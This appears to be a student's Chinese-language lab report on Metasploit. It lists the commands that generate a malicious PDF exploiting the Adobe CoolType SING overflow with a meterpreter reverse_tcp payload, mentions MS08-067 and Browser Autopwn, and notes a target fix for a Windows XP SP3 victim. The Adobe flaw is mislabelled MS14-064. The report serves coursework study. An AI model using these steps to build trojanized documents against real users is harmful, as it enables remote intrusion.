89
社区成员
1. 实验内容
1.1 实验要求
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
1.4 成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的。
2. 实验过程
2.1 一个主动攻击实践,尽量使用最新的类似漏洞
MS08-067
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pro-Beta。
MS14-064
Adobe Reader在处理CoolType字体文件的sing表时,存在栈溢出漏洞,当打开特制的恶意PDF文件时,可允许任意代码远程执行。所以我利用这个漏洞。
2.3.1 查找漏洞存在
查一下Adobe,发现存在。
2.3.2 开始攻击
进入 Kali Linux,使用 Metasploit 生成 PDF 木马文件。
1.搜索 Adobe 渗透模块
search adobe_cooltype_sing
2.调用渗透模块
use exploit/windows/fileformat/adobe_cooltype_sing/
3.查看模块详情
info
4.调用meterpreter载荷,反向连接到渗透机
set payload windows/meterpreter/reverse_tcp
5.设置Kali Linux的IP地址
set LHOST 攻击机ip地址
6.设置本地监听端口
set LPORT 端口
7.设置带有后门程序的PDF文件
set FILENAME 起个名字.pdf
8.执行渗透生成文件
exploit
2.4 成功应用任何一个辅助模块
Browser Autopwn
Browser Autopwn 是由Metasploit提供的一个辅助模块。当访问一个Web页面时,它允许用户自动地攻击一个入侵主机。Browser Autopwn在攻击之前,会先进行指纹信息操作,这意味着它不会攻击Mozilla Firefox浏览器,而只会攻击系统自带的Internet Explorer7浏览器。
3. 问题及解决方案
任务1里面Exploit completed,but no session was created报错,是因为没有设置target,Metaexploit会使用默认的Exploit Target 0,我的靶机系统是Windows XP SP3,需要设置target为34,就ok了
4.学习感悟、思考等
在这次实验中,我学习了metasploit的基本应用方式,重点掌握了三种攻击方式的思路。在完成任务的过程中,我遇到了很多困难和挑战。尤其是在针对浏览器和客户端的攻击中,由于漏洞的不断更新和修复,我需要不断地寻找最新的漏洞并进行尝试。我还学习了如何使用辅助模块,这些模块可以帮助我更加高效地进行攻击和渗透测试。总的来说,这次计算机实验让我受益匪浅。通过实践,我不仅掌握了metasploit的基本应用方式,还深入了解了网络安全的重要性和攻击的原理。我相信,在今后的学习和工作中,这些知识和经验都会对我有很大的帮助。